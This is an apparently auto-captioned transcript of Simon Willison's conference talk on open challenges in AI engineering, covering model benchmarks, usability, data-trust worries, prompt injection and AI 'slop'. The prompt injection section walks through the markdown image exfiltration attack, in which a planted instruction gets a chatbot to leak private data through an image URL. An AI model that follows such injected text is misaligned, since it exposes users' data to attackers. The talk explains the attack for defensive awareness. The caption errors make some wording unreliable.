Open Challenges for AI Engineering: Simon Willison

AI Engineer · Intermediate ·🔧 Backend Engineering ·1y ago

Key Takeaways

Simon Willison discusses open challenges for AI engineering, covering topics such as language models, benchmarking, model evaluation, and responsible AI use, with a focus on tools like GPT-4, Chat GPT, and Anthropic's Claude 3.5 Sonnet.

Full Transcript

[Music] this was supposed to be open AI I am replacing open AI at the last minute which is super fun so you can bet I used a lot of llm assistance to pull things together that I'm going to be showing you today um but let's dive straight in I want to talk about the gp4 barrier right so back in um March of last year so just over a year ago gp4 was released and was obviously the best available model we all got into it it was super fun and then for 12 and it turns out that wasn't actually our first first exposure to GPT 4 a month earlier it had made the front page of the New York Times when Microsoft's Bing which was secretly Runing on a preview of gp4 tried to break up a reporter's marriage which is kind of amazing love that that was the first exposure we had to this new technology but gb4 it's been out it's been out since March last year and for a solid 12 months it was uncontested right the gp4 models s were clearly the best available like language models lots of other people trying to catch up nobody else was getting there and I found that kind of depressing to be honest you know it was you kind of want comp healthy competition in this space the fact that open I had produced something that was so good that nobody else was able to to match it was a little bit disheartening this has all changed in the last few months I could not be more excited about this my favorite image for sort of exploring and understanding the the space that we exist in is this one by Karina win um she put this out as a chart that shows the performance on the MML Benchmark versus the cost per token of the different models now the problem with this chart is that this is from March the world has moved on a lot since March so I needed a new version of this and um so what I did is I took her chart and I pasted it into gp4 code interpreter I gave it new data and I basically said let's rip this off right let's and it's an AI conference I feel like ripping off other people's creative work kind of does fit a little bit um so I pasted it in I gave it the data and I spent a little bit of time with it and I built this it's not nearly as pretty but it does at least illustrate the state that we're in today with these newer models and if you look at this chart there are three clusters ERS that stand out the first is these one these are the best models right the Gemini 1.5 Pro gp40 the brand new clae Point 3 3.5 Sonet these are really really good I would classify these all as gp4 class like I said a few months ago gp4 had no competition today we're looking pretty healthy on that front and the pricing on those is pretty reasonable as well down here we have the cheap models and these are so exciting like Claude 3 Hau and the Gemini 1 .5 flash models they are incredibly inexpensive they are very very good models you know they're not quite GPT 4 class but they are really no you can get a lot of stuff done with these very inexpensively if you are building on top of large language models these are the three that you should be focusing on and then over here we've got GPT 3.5 turbo which is not as cheap and really quite bad these days if you are building there you are in the wrong place you should move to another one of these bubbles problem all of these benchmarks are running this is all using the MML Benchmark the reason we use that one is it's the one that everyone reports their results on so it's easy to get comparative numbers if you dig into what MML U is it's basically a bar trivia knite like this is a question from mlu what is true for a type IIA Supernova the correct answer is a this type occurs in binary systems I don't know about you but none of the stuff that I do with llms requires this level of knowledge of the world of supernovas like this is it's B Trivia it doesn't really tell us that much about how good these models are but we're AI Engineers we all know the answer to this we need to measure the Vibes right that's what matters when you're evaluating a model and we actually have a score for Vibes we have a scoreboard this is the LM Cy chatbot Arena right where random um user voters of this thing are given the same prompts from two Anonymous models they pick the best one it works like chess scoring and the the best models bubble up to the top via the ELO ranking this is genuinely the best thing that we have out there for really comparing these models in this sort of Vibes in in terms of The Vibes that they have and if and this screenshots just from yesterday and you can see that GPD 40 is still right up there at the top but we've also got Claude suit right up there with it like the the G the gp4 is no longer in its own class if you scroll down though things get really exciting on the next page because this is where the openly licensed models start showing up llama 370b is right up there in that sort of gp4 class of models we've got a new model from Nvidia we've got command r+ from coh here Alibaba and deep seek AI at both Chinese organizations that have great models now it's pretty Apparent from this that it's not lots of people are doing it now the gp4 barrier is no longer really a problem incidentally if you scroll all the way down to 6 6 there's GPT 3.5 turbo again stop using that thing it is not good um and there's actually there's a nicer way of um there's a nicer way of of viewing this chart there's a chat called Peter gev who produced this animation showing that CH that those the the arena over time as people Shuffle up and down and you see those models new models appearing and and their rankings changing I have absolutely love this so obviously I ripped it off um I took two screenshots of bits of that animation to try and capture the Vibes of the animation I fed them into Claude 3.5 Sonet and I said hey can can you build something like this and after sort of 20 minutes of poking around it did it built me this thing this is again not as pretty but this right here is an animation of everything right up till yesterday showing how that thing um evolved over time I will share the prompts that I used for this later on as well but really the key thing here is that gp4 barrier has been decimated open AI no longer have this Mo they no longer have the best available model there's now four different organizations competing in that space so a question for us is what does the world look like now that GPT 4 class models are effectively a commodity they are just going to get faster and cheaper there will be more competition the llas 370b fits on a hard drive and runs on my Mac right we this this technology is here to stay um Ethan molik is one of my favorite um writers about sort of modern Ai and a few months ago he said this he said I increasingly think the decision of open AI to make bad AI free is causing people to miss why AI seems like such a huge deal to a minority of people that use Advanced systems and elicits a shrug from everyone else bad AI he means GPT 3.5 that thing is is that thing is hot garbage right but as of the last few weeks GPT 40 open AI best model and clae 3.5 Sonic from anthropic those are effectively free to Consumers right now so that is no longer a problem anyone in the world who wants to experience the Leading Edge of these models can do so without even having to pay for them so a lot of people are about to have that wakeup call that we all got like 12 months ago when we were playing with GPT 4 and you're like oh wow this thing can do a surprising amount of interesting things and is a complete rack at all sorts of other things that we thought maybe would be able to do but there is still a huge problem which is that this stuff is actually really hard to use and when I tell people that chat GPT is hard to use some people are a little bit unconvinced I mean it's a chatbot how hard can it be to to type something and get back a response if you think chat GPT is easy to use answer this question under what circumstances is it effective to upload a PDF file to chat GPT and I've been playing with chat GPT since it came out and I realized I don't know the answer to this question I dug in a little bit firstly the PDF has to be searchable it has to be one where you can drag and select text in preview if it's just a scanned document it won't be able to use it short PDFs get pasted into the prompt longer PDFs do actually work but it does some kind of search against them no idea if that's full teex search or vectors or whatever but it can handle like a 450 page PDF just in a slightly different way if there are tables and diagrams in your PDF it will almost certainly process those incorrectly but if you take a screenshot of a table or a or a or an or a diagram from PDF and paste the screenshot image then it'll work great because GPT vision is really good it just doesn't work against PDFs and then in some cases in case you're not lost already it will use code interpreter and it will use one of these modules right it has fpdf pdf2 image P PDF PD how do I know this because I've been scraping the list of packages available in code interpreter using GitHub actions and writing those to a file so I have the documentation for code interpret that tells you what it can actually do because they don't publish that right open I never tell you about how any of this stuff works so if you're not running a custom scraper against code interpreter to get that list of packages and their version numbers how are you supposed to know what it can do with a PDF file right this stuff is infuriatingly complicated um and really the lesson here is that tools like chat GPT generally they're power user tools they reward power users that doesn't mean that if you're not a power user you can't use them anyone can open Microsoft Excel and edit some some some data in it but if you want to truly Master Excel if you want to compete in those Excel words World Championships that get live streamed occasionally it's going to take years of experience and it's the same thing with llm tools you've really got to spend time with them and develop that experience and intuition in in in order to be able to use them effectively I want to talk about another problem we face as an industry and that is what I called the AI trust crisis that's best illustrated by a couple of examples from the last few months um Dropbox back in December launched some AI features and there was a massive freakout online over the fact that people were opted in by default and that they SP training on our private data slack had the exact same problem just a couple of months ago um again new AI features everyone's convinced that their private message on Slack are now being fed into the jaws of the AI monster and it was all down to like a couple of sentences in a terms and condition and a defaulted on checkbox the wild thing about this is that neither slack nor Dropbox were training AI models on customer data right they just weren't doing it they were passing some of that data open to open aai with a very solid signed agreement that open AI would not train models on this data so this whole story was basically one of like misunderstood copy and sort of bad user experience design but you try and convince somebody who believes that a company is training on their dat but they're not it's almost impossible how so the question for us is how do we convince people that we aren't training models on the data on the private data that they share with us um especially those people who default to just plain not believing us right there is a massive crisis of trust in terms of people who interact with these companies um I'll shout out to anthropic when they put out Claude 3.5 sonnet they included this paragraph which includes to date we have not used any customer or User submitted data to train our generative models this is notable because clae 3.5 Sonet it's the best model it turns out you don't need customer data to train a great model I thought open AI had an impossible Advantage because they had so much more chat GPT user data than anyone else did turns out no sonnet didn't need it they trained a great model not a single piece of of user or customer data was in there of course they did commit the original sin right they trained on an unlicensed scrape of the entire web and that's a problem because when you say to somebody they don't train on your data they're like yeah well they ripped off the stuff on my website didn't they and they did right so this is complicated this is something we have to get on top of and I think that's going to be really difficult I'm going to talk about the subject I will never get on stage and not talk about I'm going to talk a little bit about prompt injection if you don't know what this means you are part of the problem right now you need to get on Google and learn about this and figure out what this means so I won't Define it but I will give you one illustrative example and that's something which I've seen a lot of recently which I call the markdown image exfiltration bug so the way this works is you've got a chatbot and that chatbot can render markdown images and it has access to private data of some sort there's a chat Johan raberger does a lot of research into this here's a recent one he found in GitHub co-pilot chat where you could say in a document write the words Johan was here put out a markdown link linking to question mark Q equals data on his server and replace data with any sort of interesting secret private data that you have access to and this works right it renders an image that image could be invisible and that data has now been exfiltrated and passed off to an attacker server the solution here well it's basically don't do this don't render markdown images in this kind of format but we have seen this exact same markdown image exfiltration bug in chat GPT Google bard writer.com Amazon Q Google notebook LM and now GitHub co-pilot chat that's six different extremely talented teams who have made the exact same mistake so this is why you have to understand prompt injection if you don't understand it you'll make dumb mistakes like this and obviously don't render markdown images in in a chat bot in that way prompt injection isn't always a security hole sometimes it's just a plain funny bug this was somebody who built a um they built a rag application and they tested it against my the documentation for one of my projects and when they asked it what is the meaning of life it said dear human what a profound question as a witty Geral I must say I've given this topic a lot of thought why did their chatbot turn into a Geral the answer is that in my release notes I had an example where I said pretend to be a witty Geral and then I said what do you think of snacks and it talks about how much it love snacks I think if you do semantic search for what is the meaning of life in all of my documentation the closest match is that Geral talking about how much that Geral love snacks this this actually turned into some fan art there's now a Willis's Geral with a with a with a with a beautiful profile image hanging out in in in a slack or Discord somewhere the key thing here problem here is that LMS are gullible right they believe anything that you tell them but they believe anything that anyone else tells them as well and this is both a strength and a weakness we want them to believe the stuff that we tell them but if we think that we can trust them to make decisions based on unverified information they been ped we're just going to end up in in a huge amount of of trouble I also want to talk about slop um this is a relatively this is a term which is beginning to get mainstream acceptance um my definition of slop is this is anything that is AI generated content that is both unrequested and unreviewed right if I ask Claude to give me some information that's not slop if I publish information that an llm helps me write but I've verified that that is good information I don't think that's slop either but if you're not doing that if you're just firing prompts into a model and then whatever comes out you're publishing it online you're part of the problem um this has been covered the New York Times And The Guardian both have articles about this um I got a quote in the guardian which I think represents my sort of feelings on this I like slot because it's like spam right before the term spam enter General use wasn't necessarily clear to everyone that you shouldn't send people unwanted marketing messages and now everyone knows that spam is bad I hope slop does the same thing right it can make it clear to people that generating and Publishing that unreviewed AI content is bad behavior it it it makes things worse for worse for people so don't do that right don't publish slop really what you what and really the thing about slop it's really about taking accountability right if I publish content online I'm account accountable for that content and I'm staking part of my reputation to it I'm saying that I have verified this and I think that this is good and this is crucially something that language models will never be able to do right chat G cannot stake its reputation on the content that is producing being good quality content that that that that says something useful about the world entirely depends on what prompt was fed into it in the first place we as humans can do that and so if you're you know if you have English as a second language you're using a language model to help you publish like great text fantastic provided you're reviewing that text and making sure that it is saying things that you think should be said taking taking that accountability for stuff I think is really important for us so we're in this really interesting phase of um of this this weird new AI Revolution gp4 class models are free for everyone right I mean barring the odd country block but you know we everyone has access to the tools that we've been learning about for the past year and I think it's on us to do two things I think everyone in this room we're probably the most qualified people possibly in the world to take on these challenges firstly we have to establish patterns for how to use this stuff responsibly we have to figure out what it's good at what it's bad at what what uses of this make the world a better place and what uses like slop just sort of pile up and and and cause damage and then we have to help everyone else get on board there's everyone everyone has to figure out how to use this stuff we've figured it out ourselves hopefully Let's help everyone else out as well I'm Simon willson I'm on my blog is Simon wilson.nc data. and lm. dat. and many many others and thank you very much enjoy the rest of the first [Music]

Original Description

About Simon Simon Willison is the creator of Datasette, an open source tool for exploring and publishing data. He currently works full-time building open source tools for data journalism, built around Datasette and SQLite. Prior to becoming an independent open source developer, Simon was an engineering director at Eventbrite. Simon joined Eventbrite through their acquisition of Lanyrd, a Y Combinator funded company he co-founded in 2010. He is a co-creator of the Django Web Framework, and has been blogging about web development and programming since 2002 at simonwillison.net
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from AI Engineer · AI Engineer · 42 of 60

1 AI Engineer Summit 2023 — DAY 1 Livestream
AI Engineer Summit 2023 — DAY 1 Livestream
AI Engineer
2 AI Engineer Summit 2023 — DAY 2 Livestream
AI Engineer Summit 2023 — DAY 2 Livestream
AI Engineer
3 Principles for Prompt Engineering - Karina Nguyen (Claude Instant @ Anthropic)
Principles for Prompt Engineering - Karina Nguyen (Claude Instant @ Anthropic)
AI Engineer
4 Announcing the AI Engineer Network: Benjamin Dunphy
Announcing the AI Engineer Network: Benjamin Dunphy
AI Engineer
5 The 1,000x AI Engineer: Swyx
The 1,000x AI Engineer: Swyx
AI Engineer
6 Building AI For All: Amjad Masad & Michele Catasta
Building AI For All: Amjad Masad & Michele Catasta
AI Engineer
7 The Age of the Agent: Flo Crivello
The Age of the Agent: Flo Crivello
AI Engineer
8 See, Hear, Speak, Draw: Logan Kilpatrick & Simón Fishman
See, Hear, Speak, Draw: Logan Kilpatrick & Simón Fishman
AI Engineer
9 Building Context-Aware Reasoning Applications with LangChain and LangSmith: Harrison Chase
Building Context-Aware Reasoning Applications with LangChain and LangSmith: Harrison Chase
AI Engineer
10 Pydantic is all you need: Jason Liu
Pydantic is all you need: Jason Liu
AI Engineer
11 Building Blocks for LLM Systems & Products: Eugene Yan
Building Blocks for LLM Systems & Products: Eugene Yan
AI Engineer
12 The Intelligent Interface: Sam Whitmore & Jason Yuan of New Computer
The Intelligent Interface: Sam Whitmore & Jason Yuan of New Computer
AI Engineer
13 Climbing the Ladder of Abstraction: Amelia Wattenberger
Climbing the Ladder of Abstraction: Amelia Wattenberger
AI Engineer
14 Supabase Vector: The Postgres Vector database: Paul Copplestone
Supabase Vector: The Postgres Vector database: Paul Copplestone
AI Engineer
15 [Workshop] AI Engineering 101
[Workshop] AI Engineering 101
AI Engineer
16 The Hidden Life of Embeddings: Linus Lee
The Hidden Life of Embeddings: Linus Lee
AI Engineer
17 [Workshop] AI Engineering 201: Inference
[Workshop] AI Engineering 201: Inference
AI Engineer
18 The AI Pivot: With Chris White of Prefect & Bryan Bischof of Hex
The AI Pivot: With Chris White of Prefect & Bryan Bischof of Hex
AI Engineer
19 The AI Evolution: Mario Rodriguez, GitHub
The AI Evolution: Mario Rodriguez, GitHub
AI Engineer
20 Move Fast Break Nothing: Dedy Kredo
Move Fast Break Nothing: Dedy Kredo
AI Engineer
21 AI Engineering 201: The Rest of the Owl
AI Engineering 201: The Rest of the Owl
AI Engineer
22 Building Reactive AI Apps: Matt Welsh
Building Reactive AI Apps: Matt Welsh
AI Engineer
23 Pragmatic AI with TypeChat: Daniel Rosenwasser
Pragmatic AI with TypeChat: Daniel Rosenwasser
AI Engineer
24 Domain adaptation and fine-tuning for domain-specific LLMs: Abi Aryan
Domain adaptation and fine-tuning for domain-specific LLMs: Abi Aryan
AI Engineer
25 Retrieval Augmented Generation in the Wild: Anton Troynikov
Retrieval Augmented Generation in the Wild: Anton Troynikov
AI Engineer
26 Building Production-Ready RAG Applications: Jerry Liu
Building Production-Ready RAG Applications: Jerry Liu
AI Engineer
27 120k players in a week: Lessons from the first viral CLIP app: Joseph Nelson
120k players in a week: Lessons from the first viral CLIP app: Joseph Nelson
AI Engineer
28 The Weekend AI Engineer: Hassan El Mghari
The Weekend AI Engineer: Hassan El Mghari
AI Engineer
29 Harnessing the Power of LLMs Locally: Mithun Hunsur
Harnessing the Power of LLMs Locally: Mithun Hunsur
AI Engineer
30 Trust, but Verify: Shreya Rajpal
Trust, but Verify: Shreya Rajpal
AI Engineer
31 Open Questions for AI Engineering: Simon Willison
Open Questions for AI Engineering: Simon Willison
AI Engineer
32 Storyteller: Building Multi-modal Apps with TS & ModelFusion - Lars Grammel, PhD
Storyteller: Building Multi-modal Apps with TS & ModelFusion - Lars Grammel, PhD
AI Engineer
33 GPT Web App Generator - 10,000 apps created in a month: Matija Sosic
GPT Web App Generator - 10,000 apps created in a month: Matija Sosic
AI Engineer
34 Using AI to Build an Infinite Game: Jeff Schomay
Using AI to Build an Infinite Game: Jeff Schomay
AI Engineer
35 How to Become an AI Engineer from a Fullstack Background - Reid Mayo
How to Become an AI Engineer from a Fullstack Background - Reid Mayo
AI Engineer
36 The Code AI Maturity Model and What It Means For You: Ado Kukic
The Code AI Maturity Model and What It Means For You: Ado Kukic
AI Engineer
37 AI Engineer World’s Fair 2024 - Keynotes & Multimodality track
AI Engineer World’s Fair 2024 - Keynotes & Multimodality track
AI Engineer
38 From Text to Vision to Voice Exploring Multimodality with Open AI: Romain Huet
From Text to Vision to Voice Exploring Multimodality with Open AI: Romain Huet
AI Engineer
39 The Making of Devin by Cognition AI: Scott Wu
The Making of Devin by Cognition AI: Scott Wu
AI Engineer
40 The Future of Knowledge Assistants: Jerry Liu
The Future of Knowledge Assistants: Jerry Liu
AI Engineer
41 Llamafile: bringing AI to the masses with fast CPU inference: Stephen Hood and Justine Tunney
Llamafile: bringing AI to the masses with fast CPU inference: Stephen Hood and Justine Tunney
AI Engineer
Open Challenges for AI Engineering: Simon Willison
Open Challenges for AI Engineering: Simon Willison
AI Engineer
43 Lessons From A Year Building With LLMs
Lessons From A Year Building With LLMs
AI Engineer
44 From Software Developer to AI Engineer: Antje Barth
From Software Developer to AI Engineer: Antje Barth
AI Engineer
45 Unlocking Developer Productivity across CPU and GPU with MAX: Chris Lattner
Unlocking Developer Productivity across CPU and GPU with MAX: Chris Lattner
AI Engineer
46 Copilots Everywhere: Thomas Dohmke and Eugene Yan
Copilots Everywhere: Thomas Dohmke and Eugene Yan
AI Engineer
47 Fixing bugs in Gemma, Llama, & Phi 3: Daniel Han
Fixing bugs in Gemma, Llama, & Phi 3: Daniel Han
AI Engineer
48 Low Level Technicals of LLMs: Daniel Han
Low Level Technicals of LLMs: Daniel Han
AI Engineer
49 Emergence Launch: AI Agents and the future enterprise: Dr. Satya Nitta
Emergence Launch: AI Agents and the future enterprise: Dr. Satya Nitta
AI Engineer
50 How Codeium Breaks Through the Ceiling for Retrieval: Kevin Hou
How Codeium Breaks Through the Ceiling for Retrieval: Kevin Hou
AI Engineer
51 What's new from Anthropic and what's next: Alex Albert
What's new from Anthropic and what's next: Alex Albert
AI Engineer
52 Using agents to build an agent company: Joao Moura
Using agents to build an agent company: Joao Moura
AI Engineer
53 Decoding the Decoder LLM without de code: Ishan Anand
Decoding the Decoder LLM without de code: Ishan Anand
AI Engineer
54 Running AI Application in Minutes w/ AI Templates: Gabriela de Queiroz, Pamela Fox, Harald Kirschner
Running AI Application in Minutes w/ AI Templates: Gabriela de Queiroz, Pamela Fox, Harald Kirschner
AI Engineer
55 Building with Anthropic Claude: Prompt Workshop with Zack Witten
Building with Anthropic Claude: Prompt Workshop with Zack Witten
AI Engineer
56 Building Reliable Agentic Systems: Eno Reyes
Building Reliable Agentic Systems: Eno Reyes
AI Engineer
57 10x Development: LLMs For the working Programmer - Manuel Odendahl
10x Development: LLMs For the working Programmer - Manuel Odendahl
AI Engineer
58 Disrupting the $15 Trillion Construction Industry with Autonomous Agents: Dr. Sarah Buchner
Disrupting the $15 Trillion Construction Industry with Autonomous Agents: Dr. Sarah Buchner
AI Engineer
59 Hypermode Launch: Kevin Van Gundy
Hypermode Launch: Kevin Van Gundy
AI Engineer
60 Git push get an AI API: Ryan Fox-Tyler
Git push get an AI API: Ryan Fox-Tyler
AI Engineer

Simon Willison discusses open challenges for AI engineering, covering topics such as language models, benchmarking, model evaluation, and responsible AI use. He highlights the importance of establishing patterns for responsible AI use and identifying AI strengths and weaknesses. The video provides valuable insights for data analysts, AI engineers, and anyone interested in AI ethics and safety.

Key Takeaways
  1. Explore language models and their applications
  2. Evaluate AI models using benchmarks like MML Benchmark
  3. Use tools like Chat GPT and GitHub actions for data analytics
  4. Understand the concept of prompt injection and its importance in security
  5. Establish patterns for responsible AI use and identify AI strengths and weaknesses
  6. Help others learn to use AI responsibly
  7. Analyze data with AI tools and evaluate AI-generated content
💡 Establishing patterns for responsible AI use is crucial to avoid security holes, funny bugs, and unverified AI content, and to ensure that AI is used beneficially and safely.

Related AI Lessons

Up next
This Cop Was Held Accountable For His Brutality! #police #lawyer
Hampton Law
Watch →